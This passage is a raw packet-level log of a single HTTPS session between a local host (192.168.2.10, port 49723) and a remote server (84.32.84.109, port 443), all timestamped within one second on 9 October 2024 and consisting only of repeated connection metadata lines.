Oct 9, 2024 16:15:59.312582016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.312599897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.312628984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.312633038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.312650919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.312706947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494573116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494668007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494688034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494697094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494705915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494715929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494731903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494735003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494745970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494762897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494765997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494787931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494800091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494817019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494832993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494868994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494873047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494932890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494944096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.494946957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.494997025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.495012045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.495028973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.495033979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.495065928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.495141029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.495170116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.495174885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.495179892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.495206118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.495254993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.499686956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.499788046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.499845028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.499896049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.499922991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.499952078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.499968052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.499970913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.499986887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500096083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500111103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500114918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500133991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500158072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500205994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500210047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500220060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500292063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500304937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500308990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.500329971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.500650883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.501789093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.501900911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.501923084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.501926899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.501950026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.501991034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502063036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502094984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502111912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502115011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502125025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502175093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502194881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502194881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502194881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502202034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502213955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502214909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502249002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502254009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502341986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502388000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.502392054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.502443075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.506891966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.506968021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.506999016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.507041931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.526915073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527013063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527039051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.527045012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527072906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.527072906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.527102947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527132034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527151108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.527154922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.527169943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.527184010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617266893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617378950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617404938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617461920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617517948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617574930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617638111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617691040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617741108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617801905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617841959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.617954969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.617966890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618001938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618032932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618124008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618185043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618197918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618248940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618251085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618274927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618300915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618390083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618448019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618453979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618504047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618505001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618527889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618557930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618654966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618762970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618784904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618791103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618834019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618877888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618961096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.618967056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.618993044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619015932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619020939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619038105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619106054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619190931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619195938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619220972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619246006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619254112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619271040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619318008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619379044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619384050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619431019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619442940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619503975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619539976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619604111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619641066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619697094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619735003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619793892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619834900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619949102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619978905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.619982958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.619998932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.620053053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.620083094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.620088100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.620105982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.620145082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.620202065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.620208025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.620249033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.621978045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.622049093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.622107029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.622172117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.639791965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.639914036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.639944077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.639950991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.639969110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.639992952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.640017986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.640075922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.640110016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.640235901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705149889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705193043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705239058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705245018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705257893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705265045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705297947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705302000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705439091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705476999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705480099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705487967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705518961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705540895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705547094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705565929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705599070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705655098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705693960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705698013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705718994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705754042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705760002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705765009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705790043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705812931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705826044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705849886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705854893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705873966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705929995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.705974102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.705980062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706021070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706029892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706063032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706083059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706088066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706103086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706127882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706299067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706341028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706348896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706351042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706358910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706387043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706403017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706408024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706415892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706509113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706532001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706537962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706547976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706609964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706634998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706640005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706662893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706686974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706727982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706732988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706779003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706886053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706938982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.706943989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.706973076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.707012892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.707015991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.707030058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.707051039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.707103014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.707108021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.707149029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.709620953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.709651947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.709736109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.709736109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.709742069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.709788084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.727756977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.727821112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.727835894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.727880955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.727977037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.728019953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.728024006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.728033066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.728063107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.728101969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793320894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793380022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793406010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793415070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793425083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793440104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793462038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793464899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793476105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793514013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793536901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793540955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793549061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793557882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793586016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793593884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793597937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793633938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793659925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793663979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793685913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793755054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793771982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793776035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793803930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793803930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793855906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793879032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793883085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793890953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793910980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793935061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793940067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793957949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.793983936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.793994904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794012070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794023991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794058084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794080019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794085026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794120073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794219971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794264078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794267893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794272900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794317007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794384003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794421911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794431925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794435978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794467926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794487953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794594049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794599056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794603109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794632912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794646978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794652939 CEST	443	49723	84.32.84.109	192.168.2.10
